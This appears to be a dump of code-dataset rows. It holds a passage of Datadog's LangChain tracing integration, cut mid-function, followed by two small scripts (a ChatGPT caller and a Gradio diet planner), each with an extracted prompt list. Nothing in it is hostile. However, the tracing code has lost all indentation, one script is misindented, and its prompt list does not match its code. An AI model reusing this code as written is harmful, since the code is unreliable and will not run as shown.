metric_value = llm_output["token_usage"].get("%s_tokens" % token_type, 0)
span.set_metric("langchain.tokens.%s_tokens" % token_type, current_metric_value + metric_value)
total_cost = span.get_metric(TOTAL_COST) or 0
if not propagate:
try:
completion_cost = get_openai_token_cost_for_model(
span.get_tag(MODEL),
span.get_metric(COMPLETION_TOKENS),
is_completion=True,
)
prompt_cost = get_openai_token_cost_for_model(span.get_tag(MODEL), span.get_metric(PROMPT_TOKENS))
total_cost = completion_cost + prompt_cost
except ValueError:
# If not in langchain's openai model catalog, the above helpers will raise a ValueError.
log.debug("Cannot calculate token/cost as the model is not in LangChain's OpenAI model catalog.")
span.set_metric(TOTAL_COST, propagated_cost + total_cost)
if span._parent is not None:
_tag_openai_token_usage(span._parent, llm_output, propagated_cost=propagated_cost + total_cost, propagate=True)
@with_traced_module
def traced_llm_generate(langchain, pin, func, instance, args, kwargs):
llm_provider = instance._llm_type
prompts = get_argument_value(args, kwargs, 0, "prompts")
integration = langchain._datadog_integration
model = _extract_model_name(instance)
span = integration.trace(
pin,
"%s.%s" % (instance.__module__, instance.__class__.__name__),
interface_type="llm",
provider=llm_provider,
model=model,
api_key=_extract_api_key(instance),
)
completions = None
try:
if integration.is_pc_sampled_span(span):
for idx, prompt in enumerate(prompts):
span.set_tag_str("langchain.request.prompts.%d" % idx, integration.trunc(str(prompt)))
for param, val in getattr(instance, "_identifying_params", {}).items():
if isinstance(val, dict):
for k, v in val.items():
span.set_tag_str("langchain.request.%s.parameters.%s.%s" % (llm_provider, param, k), str(v))
else:
span.set_tag_str("langchain.request.%s.parameters.%s" % (llm_provider, param), str(val))
completions = func(*args, **kwargs)
if isinstance(instance, langchain.llms.OpenAI):
_tag_openai_token_usage(span, completions.llm_output)
integration.record_usage(span, completions.llm_output)
for idx, completion in enumerate(completions.generations):
if integration.is_pc_sampled_span(span):
span.set_tag_str("langchain.response.completions.%d.text" % idx, integration.trunc(completion[0].text))
if completion and completion[0].generation_info is not None:
span.set_tag_str(
"langchain.response.completions.%d.finish_reason" % idx,
str(completion[0].generation_info.get("finish_reason")),
)
span.set_tag_str(
"langchain.response.completions.%d.logprobs" % idx,
str(completion[0].generation_info.get("logprobs")),
)
except Exception:
span.set_exc_info(*sys.exc_info())
integration.metric(span, "incr", "request.error", 1)
raise
finally:
span.finish()
integration.metric(span, "dist", "request.duration", span.duration_ns)
if integration.is_pc_sampled_log(span):
if completions is None:
log_completions = []
else:
log_completions = [
[{"text": completion.text} for completion in completions] for completions in completions.generations
]
integration.log(
span,
"info" if span.error == 0 else "error",
"sampled %s.%s" % (instance.__module__, instance.__class__.__name__),
attrs={
"prompts": prompts,
"choices": log_completions,
},
)
return completions
@with_traced_module
async def traced_llm_agenerate(langchain, pin, func, instance, args, kwargs):
llm_provider = instance._llm_type
prompts = get_argument_value(args, kwargs, 0, "prompts")
integration = langchain._datadog_integration
model = _extract_model_name(instance)
span = integration.trace(
pin,
"%s.%s" % (instance.__module__, instance.__class__.__name__),
interface_type="llm",
provider=llm_provider,
model=model,
api_key=_extract_api_key(instance),
)
completions = None
try:
if integration.is_pc_sampled_span(span):
for idx, prompt in enumerate(prompts):
span.set_tag_str("langchain.request.prompts.%d" % idx, integration.trunc(str(prompt)))
for param, val in getattr(instance, "_identifying_params", {}).items():
if isinstance(val, dict):
for k, v in val.items():
span.set_tag_str("langchain.request.%s.parameters.%s.%s" % (llm_provider, param, k), str(v))
else:
span.set_tag_str("langchain.request.%s.parameters.%s" % (llm_provider, param), str(val))
completions = await func(*args, **kwargs)
if isinstance(instance, langchain.llms.OpenAI):
_tag_openai_token_usage(span, completions.llm_output)
integration.record_usage(span, completions.llm_output)
for idx, completion in enumerate(completions.generations):
if integration.is_pc_sampled_span(span):
span.set_tag_str("langchain.response.completions.%d.text" % idx, integration.trunc(completion[0].text))
if completion and completion[0].generation_info is not None:
span.set_tag_str(
"langchain.response.completions.%d.finish_reason" % idx,
str(completion[0].generation_info.get("finish_reason")),
)
span.set_tag_str(
"langchain.response.completions.%d.logprobs" % idx,
str(completion[0].generation_info.get("logprobs")),
)
except Exception:
span.set_exc_info(*sys.exc_info())
integration.metric(span, "incr", "request.error", 1)
raise
finally:
span.finish()
integration.metric(span, "dist", "request.duration", span.duration_ns)
if integration.is_pc_sampled_log(span):
if completions is None:
log_completions = []
else:
log_completions = [
[{"text": completion.text} for completion in completions] for completions in completions.generations
]
integration.log(
span,
"info" if span.error == 0 else "error",
"sampled %s.%s" % (instance.__module__, instance.__class__.__name__),
attrs={
"prompts": prompts,
"choices": log_completions,
},
)
return completions
@with_traced_module
def traced_chat_model_generate(langchain, pin, func, instance, args, kwargs):
llm_provider = instance._llm_type.split("-")[0]
chat_messages = get_argument_value(args, kwargs, 0, "chat_messages")
integration = langchain._datadog_integration
span = integration.trace(
pin,
"%s.%s" % (instance.__module__, instance.__class__.__name__),
interface_type="chat_model",
provider=llm_provider,
model=_extract_model_name(instance),
api_key=_extract_api_key(instance),
)
chat_completions = None
try:
for message_set_idx, message_set in enumerate(chat_messages):
for message_idx, message in enumerate(message_set):
if integration.is_pc_sampled_span(span):
span.set_tag_str(
"langchain.request.messages.%d.%d.content" % (message_set_idx, message_idx),
integration.trunc(message.content),
)
span.set_tag_str(
"langchain.request.messages.%d.%d.message_type" % (message_set_idx, message_idx),
message.__class__.__name__,
)
for param, val in getattr(instance, "_identifying_params", {}).items():
if isinstance(val, dict):
for k, v in val.items():
span.set_tag_str("langchain.request.%s.parameters.%s.%s" % (llm_provider, param, k), str(v))
else:
span.set_tag_str("langchain.request.%s.parameters.%s" % (llm_provider, param), str(val))
chat_completions = func(*args, **kwargs)
if isinstance(instance, langchain.chat_models.ChatOpenAI):
_tag_openai_token_usage(span, chat_completions.llm_output)
integration.record_usage(span, chat_completions.llm_output)
for message_set_idx, message_set in enumerate(chat_completions.generations):
for idx, chat_completion in enumerate(message_set):
if integration.is_pc_sampled_span(span):
span.set_tag_str(
"langchain.response.completions.%d.%d.content" % (message_set_idx, idx),
integration.trunc(chat_completion.text),
)
span.set_tag_str(
"langchain.response.completions.%d.%d.message_type" % (message_set_idx, idx),
chat_completion.message.__class__.__name__,
)
except Exception:
span.set_exc_info(*sys.exc_info())
integration.metric(span, "incr", "request.error", 1)
raise
finally:
span.finish()
integration.metric(span, "dist", "request.duration", span.duration_ns)
if integration.is_pc_sampled_log(span):
if chat_completions is None:
log_chat_completions = []
else:
log_chat_completions = [
[
{
"content": message.text,
"message_type": message.message.__class__.__name__,
}
for message in messages
]
for messages in chat_completions.generations
]
integration.log(
span,
"info" if span.error == 0 else "error",
"sampled %s.%s" % (instance.__module__, instance.__class__.__name__),
attrs={
"messages": [
[
{
"content": message.content,
"message_type": message.__class__.__name__,
}
for message in messages
]
for messages in chat_messages
],
"choices": log_chat_completions,
},
)
return chat_completions
@with_traced_module
async def traced_chat_model_agenerate(langchain, pin, func, instance, args, kwargs):
llm_provider = instance._llm_type.split("-")[0]
chat_messages = get_argument_value(args, kwargs, 0, "chat_messages")
integration = langchain._datadog_integration
span = integration.trace(
pin,
"%s.%s" % (instance.__module__, instance.__class__.__name__),
interface_type="chat_model",
provider=llm_provider,
model=_extract_model_name(instance),
api_key=_extract_api_key(instance),
)
chat_completions = None
try:
for message_set_idx, message_set in enumerate(chat_messages):
for message_idx, message in enumerate(message_set):
if integration.is_pc_sampled_span(span):
span.set_tag_str(
"langchain.request.messages.%d.%d.content" % (message_set_idx, message_idx),
integration.trunc(message.content),
)
span.set_tag_str(
"langchain.request.messages.%d.%d.message_type" % (message_set_idx, message_idx),
message.__class__.__name__,
)
for param, val in getattr(instance, "_identifying_params", {}).items():
if isinstance(val, dict):
for k, v in val.items():
span.set_tag_str("langchain.request.%s.parameters.%s.%s" % (llm_provider, param, k), str(v))
else:
span.set_tag_str("langchain.request.%s.parameters.%s" % (llm_provider, param), str(val))
chat_completions = await func(*args, **kwargs)
if isinstance(instance, langchain.chat_models.ChatOpenAI):
_tag_openai_token_usage(span, chat_completions.llm_output)
integration.record_usage(span, chat_completions.llm_output)
for message_set_idx, message_set in enumerate(chat_completions.generations):
for idx, chat_completion in enumerate(message_set):
if integration.is_pc_sampled_span(span):
span.set_tag_str(
"langchain.response.completions.%d.%d.content" % (message_set_idx, idx),
integration.trunc(chat_completion.text),
)
span.set_tag_str(
"langchain.response.completions.%d.%d.message_type" % (message_set_idx, idx),
chat_completion.message.__class__.__name__,
)
except Exception:
span.set_exc_info(*sys.exc_info())
integration.metric(span, "incr", "request.error", 1)
raise
finally:
span.finish()
integration.metric(span, "dist", "request.duration", span.duration_ns)
if integration.is_pc_sampled_log(span):
if chat_completions is None:
log_chat_completions = []
else:
log_chat_completions = [
[
{
"content": message.text,
"message_type": message.message.__class__.__name__,
}
for message in messages
]
for messages in chat_completions.generations
]
integration.log(
span,
"info" if span.error == 0 else "error",
"sampled %s.%s" % (instance.__module__, instance.__class__.__name__),
attrs={
"messages": [
[
{
"content": message.content,
"message_type": message.__class__.__name__,
}
for message in messages
]
for messages in chat_messages
],
"choices": log_chat_completions,
},
)
return chat_completions
@with_traced_module
def traced_embedding(langchain, pin, func, instance, args, kwargs):
input_texts = get_argument_value(args, kwargs, 0, "text")
provider = instance.__class__.__name__.split("Embeddings")[0].lower()
integration = langchain._datadog_integration
span = integration.trace(
pin,
"%s.%s" % (instance.__module__, instance.__class__.__name__),
interface_type="embedding",
provider=provider,
model=_extract_model_name(instance),
api_key=_extract_api_key(instance),
)
try:
if isinstance(input_texts, str):
if integration.is_pc_sampled_span(span):
span.set_tag_str("langchain.request.inputs.0.text", integration.trunc(input_texts))
span.set_metric("langchain.request.input_count", 1)
else:
if integration.is_pc_sampled_span(span):
for idx, text in enumerate(input_texts):
span.set_tag_str("langchain.request.inputs.%d.text" % idx, integration.trunc(text))
span.set_metric("langchain.request.input_count", len(input_texts))
# langchain currently does not support token tracking for OpenAI embeddings:
# https://github.com/hwchase17/langchain/issues/945
embeddings = func(*args, **kwargs)
if isinstance(embeddings, list) and isinstance(embeddings[0], list):
for idx, embedding in enumerate(embeddings):
span.set_metric("langchain.response.outputs.%d.embedding_length" % idx, len(embedding))
else:
span.set_metric("langchain.response.outputs.embedding_length", len(embeddings))
except Exception:
span.set_exc_info(*sys.exc_info())
integration.metric(span, "incr", "request.error", 1)
raise
finally:
span.finish()
integration.metric(span, "dist", "request.duration", span.duration_ns)
if integration.is_pc_sampled_log(span):
integration.log(
span,
"info" if span.error == 0 else "error",
"sampled %s.%s" % (instance.__module__, instance.__class__.__name__),
attrs={"inputs": [input_texts] if isinstance(input_texts, str) else input_texts},
)
return embeddings
@with_traced_module
def traced_chain_call(langchain, pin, func, instance, args, kwargs):
integration = langchain._datadog_integration
span = integration.trace(pin, "%s.%s" % (instance.__module__, instance.__class__.__name__), interface_type="chain")
final_outputs = {}
try:
inputs = args[0]
if not isinstance(inputs, dict):
inputs = {instance.input_keys[0]: inputs}
if integration.is_pc_sampled_span(span):
for k, v in inputs.items():
span.set_tag_str("langchain.request.inputs.%s" % k, integration.trunc(str(v)))
if hasattr(instance, "prompt"):
span.set_tag_str("langchain.request.prompt", integration.trunc(str(instance.prompt.template)))
final_outputs = func(*args, **kwargs)
if integration.is_pc_sampled_span(span):
for k, v in final_outputs.items():
span.set_tag_str("langchain.response.outputs.%s" % k, integration.trunc(str(v)))
except Exception:
span.set_exc_info(*sys.exc_info())
integration.metric(span, "incr", "request.error", 1)
raise
finally:
span.finish()
integration.metric(span, "dist", "request.duration", span.duration_ns)
if integration.is_pc_sampled_log(span):
log_inputs = {}
log_outputs = {}
for k, v in inputs.items():
log_inputs[k] = str(v)
for k, v in final_outputs.items():
log_outputs[k] = str(v)
integration.log(
span,
"info" if span.error == 0 else "error",
"sampled %s.%s" % (instance.__module__, instance.__class__.__name__),
attrs={
"inputs": log_inputs,
"prompt": str(instance.prompt.template) if hasattr(instance, "prompt") else "",
"outputs": log_outputs,
},
)
return final_outputs
@with_traced_module
async def traced_chain_acall(langchain, pin, func, instance, args, kwargs):
integration = langchain._datadog_integration
span = integration.trace(pin, "%s.%s" % (instance.__module__, instance.__class__.__name__), interface_type="chain")
final_outputs = {}
try:
inputs = args[0]
if not isinstance(inputs, dict):
inputs = {instance.input_keys[0]: inputs}
if integration.is_pc_sampled_span(span):
for k, v in inputs.items():
span.set_tag_str("langchain.request.inputs.%s" % k, integration.trunc(str(v)))
if hasattr(instance, "prompt"):
span.set_tag_str("langchain.request.prompt", integration.trunc(str(instance.prompt.template)))
final_outputs = await func(*args, **kwargs)
if integration.is_pc_sampled_span(span):
for k, v in final_outputs.items():
span.set_tag_str("langchain.response.outputs.%s" % k, integration.trunc(str(v)))
except Exception:
span.set_exc_info(*sys.exc_info())
integration.metric(span, "incr", "request.error", 1)
raise
finally:
span.finish()
integration.metric(span, "dist", "request.duration", span.duration_ns)
if integration.is_pc_sampled_log(span):
log_inputs = {}
log_outputs = {}
for k, v in inputs.items():
log_inputs[k] = str(v)
for k, v in final_outputs.items():
log_outputs[k] = str(v)
integration.log(
span,
"info" if span.error == 0 else "error",
"sampled %s.%s" % (instance.__module__, instance.__class__.__name__),
attrs={
"inputs": log_inputs,
"prompt": str(instance.prompt.template) if hasattr(instance, "prompt") else "",
"outputs": log_outputs,
},
)
return final_outputs
@with_traced_module
def traced_similarity_search(langchain, pin, func, instance, args, kwargs):
integration = langchain._datadog_integration
query = get_argument_value(args, kwargs, 0, "query")
k = kwargs.get("k", args[1] if len(args) >= 2 else None)
provider = instance.__class__.__name__.lower()
span = integration.trace(
pin,
"%s.%s" % (instance.__module__, instance.__class__.__name__),
interface_type="similarity_search",
provider=provider,
api_key=_extract_api_key(instance),
)
documents = []
try:
if integration.is_pc_sampled_span(span):
span.set_tag_str("langchain.request.query", integration.trunc(query))
if k is not None:
span.set_tag_str("langchain.request.k", str(k))
for kwarg_key, v in kwargs.items():
span.set_tag_str("langchain.request.%s" % kwarg_key, str(v))
if isinstance(instance, langchain.vectorstores.Pinecone):
span.set_tag_str(
"langchain.request.pinecone.environment",
instance._index.configuration.server_variables.get("environment", ""),
)
span.set_tag_str(
"langchain.request.pinecone.index_name",
instance._index.configuration.server_variables.get("index_name", ""),
)
span.set_tag_str(
"langchain.request.pinecone.project_name",
instance._index.configuration.server_variables.get("project_name", ""),
)
api_key = instance._index.configuration.api_key.get("ApiKeyAuth", "")
span.set_tag_str(API_KEY, "...%s" % api_key[-4:]) # override api_key for Pinecone
documents = func(*args, **kwargs)
span.set_metric("langchain.response.document_count", len(documents))
for idx, document in enumerate(documents):
span.set_tag_str(
"langchain.response.document.%d.page_content" % idx, integration.trunc(str(document.page_content))
)
for kwarg_key, v in document.metadata.items():
span.set_tag_str(
"langchain.response.document.%d.metadata.%s" % (idx, kwarg_key), integration.trunc(str(v))
)
except Exception:
span.set_exc_info(*sys.exc_info())
integration.metric(span, "incr", "request.error", 1)
raise
finally:
span.finish()
integration.metric(span, "dist", "request.duration", span.duration_ns)
if integration.is_pc_sampled_log(span):
integration.log(
span,
"info" if span.error == 0 else "error",
"sampled %s.%s" % (instance.__module__, instance.__class__.__name__),
attrs={
"query": query,
"k": k or "",
"documents": [
{"page_content": document.page_content, "metadata": document.metadata} for document in documents
],
},
)
return documents
def patch():
if getattr(langchain, "_datadog_patch", False):
return
setattr(langchain, "_datadog_patch", True)
# TODO: How do we test this? Can we mock out the metric/logger/sampler?
ddsite = os.getenv("DD_SITE", "datadoghq.com")
ddapikey = os.getenv("DD_API_KEY", config.langchain._api_key)
Pin().onto(langchain)
integration = _LangChainIntegration(
config=config.langchain,
stats_url=get_stats_url(),
site=ddsite,
api_key=ddapikey,
)
setattr(langchain, "_datadog_integration", integration)
if config.langchain.logs_enabled:
if not ddapikey:
raise ValueError(
"DD_API_KEY is required for sending logs from the LangChain integration."
" The LangChain integration can be disabled by setting the ``DD_TRACE_LANGCHAIN_ENABLED``"
" environment variable to False."
)
integration.start_log_writer()
# TODO: check if we need to version gate LLM/Chat/TextEmbedding
wrap("langchain", "llms.base.BaseLLM.generate", traced_llm_generate(langchain))
wrap("langchain", "llms.BaseLLM.agenerate", traced_llm_agenerate(langchain))
wrap("langchain", "chat_models.base.BaseChatModel.generate", traced_chat_model_generate(langchain))
wrap("langchain", "chat_models.base.BaseChatModel.agenerate", traced_chat_model_agenerate(langchain))
wrap("langchain", "chains.base.Chain.__call__", traced_chain_call(langchain))
wrap("langchain", "chains.base.Chain.acall", traced_chain_acall(langchain))
# Text embedding models override two abstract base methods instead of super calls, so we need to
# wrap each langchain-provided text embedding model.
for text_embedding_model in text_embedding_models:
if hasattr(langchain.embeddings, text_embedding_model):
wrap("langchain", "embeddings.%s.embed_query" % text_embedding_model, traced_embedding(langchain))
wrap("langchain", "embeddings.%s.embed_documents" % text_embedding_model, traced_embedding(langchain))
# TODO: langchain >= 0.0.209 includes async embedding implementation (only for OpenAI)
# We need to do the same with Vectorstores.
for vectorstore in vectorstores:
if hasattr(langchain.vectorstores, vectorstore):
wrap("langchain", "vectorstores.%s.similarity_search" % vectorstore, traced_similarity_search(langchain))
def unpatch():
if getattr(langchain, "_datadog_patch", False):
setattr(langchain, "_datadog_patch", False)
unwrap(langchain.llms.base.BaseLLM, "generate")
unwrap(langchain.llms.base.BaseLLM, "agenerate")
unwrap(langchain.chat_models.base.BaseChatModel, "generate")
unwrap(langchain.chat_models.base.BaseChatModel, "agenerate")
unwrap(langchain.chains.base.Chain, "__call__")
unwrap(langchain.chains.base.Chain, "acall")
for text_embedding_model in text_embedding_models:
if hasattr(langchain.embeddings, text_embedding_model):
unwrap(getattr(langchain.embeddings, text_embedding_model), "embed_query")
unwrap(getattr(langchain.embeddings, text_embedding_model), "embed_documents")
for vectorstore in vectorstores:
if hasattr(langchain.vectorstores, vectorstore):
unwrap(getattr(langchain.vectorstores, vectorstore), "similarity_search")
delattr(langchain, "_datadog_integration")
| [] |
2024-01-10 | Himabitoo/TalkWith-ChatGpt | TalkWith.py | import os
import openai
from dotenv import load_dotenv
class TalkWith:
def __init__(self):
# env load
load_dotenv()
#works
        self._post_api('hello')
def _post_api(self,msg):
        # pass the API key
        openai.api_key = os.getenv('OPEN_API_KEY')
        # request a chat completion for the given message and get the response
        response = openai.ChatCompletion.create(
            model="gpt-3.5-turbo",
            messages=[
                {
                    "role": "user",
                    "content": msg
                }
            ],
            temperature=0,
            max_tokens=20
        )
print('response', response)
print(response["choices"][0]["message"]["content"])
if __name__ == '__main__':
    TalkWith()
| [
"Say this is a test"
] |
2024-01-10 | ma-rista/NutriScanPlanner | diet_planner~diet_planner.py | import gradio as gr
import openai
import deepl
from openai import OpenAI
# Set the API key for the OpenAI library
openai.api_key = ''
client = OpenAI(api_key='')
# Set the DeepL API authentication key
auth_key = ""
translator = deepl.Translator(auth_key)
def translate_text_with_deepl(text, target_language="KO"):
try:
result = translator.translate_text(text, target_lang=target_language)
return result.text
except deepl.DeepLException as error:
print(error)
        return text  # return the original text if translation fails
def generate_diet_plan(calories, ingredients, cuisine, dietary_restrictions, allergies, medical_conditions, meals_per_day, cooking_preference):
    # Build the chat-format messages
messages = [
{"role": "system", "content": "You are an assistant capable of creating personalized diet plans."},
{"role": "user", "content": f"Create a diet plan with the following requirements:\nCalories: {calories}\nIngredients: {ingredients}\nCuisine: {cuisine}\nDietary Restrictions: {dietary_restrictions}\nAllergies: {allergies}\nMedical Conditions: {medical_conditions}\nMeals per day: {meals_per_day}\nCooking Preference: {cooking_preference}"}
]
    # Call the GPT API
completion = client.chat.completions.create(
model="gpt-3.5-turbo",
messages=messages
)
    # Convert the result to Markdown format
diet_plan = completion.choices[0].message.content
    translated_diet_plan = translate_text_with_deepl(diet_plan, "KO")  # the diet plan translated into Korean
# markdown_format = f"### Generated Diet Plan\n\n{diet_plan}"
markdown_format = f"### 생성된 식단 계획 (Translated)\n\n{translated_diet_plan}"
return markdown_format
# Build the Gradio interface
with gr.Blocks() as demo:
with gr.Row():
with gr.Column():
            # Input widgets
calories = gr.Number(label="TDEE 계산기로 입력받은 칼로리")
ingredients = gr.Textbox(label="식재료")
cuisine = gr.CheckboxGroup(choices=["한식", "중식", "양식"], label="카테고리")
dietary_restrictions = gr.CheckboxGroup(choices=["채식", "저탄수화물"], label="식이 제한")
allergies = gr.CheckboxGroup(choices=["땅콩", "우유", "글루텐"], label="알레르기 및 불내성")
medical_conditions = gr.CheckboxGroup(choices=["당뇨병", "고혈압"], label="의료 상태")
meals_per_day = gr.Radio(choices=["2끼", "3끼", "4끼"], label="하루 몇 끼 섭취")
cooking_preference = gr.CheckboxGroup(choices=["간단한 조리", "긴 조리 시간"], label="조리 시간 및 용이성")
submit_button = gr.Button("식단 생성")
with gr.Column():
            # Output display
result = gr.Markdown()
    # Define the behavior when the button is clicked
submit_button.click(
generate_diet_plan,
inputs=[calories, ingredients, cuisine, dietary_restrictions, allergies, medical_conditions, meals_per_day, cooking_preference],
outputs=result
)
demo.launch()
| [
"Create a diet plan with the following requirements:\nCalories: PLACEHOLDER\nIngredients: PLACEHOLDER\nCuisine: PLACEHOLDER\nDietary Restrictions: PLACEHOLDER\nAllergies: PLACEHOLDER\nMedical Conditions: PLACEHOLDER\nMeals per day: PLACEHOLDER\nCooking Preference: PLACEHOLDER",
"You are an assistant capable of creating personalized diet plans."
] |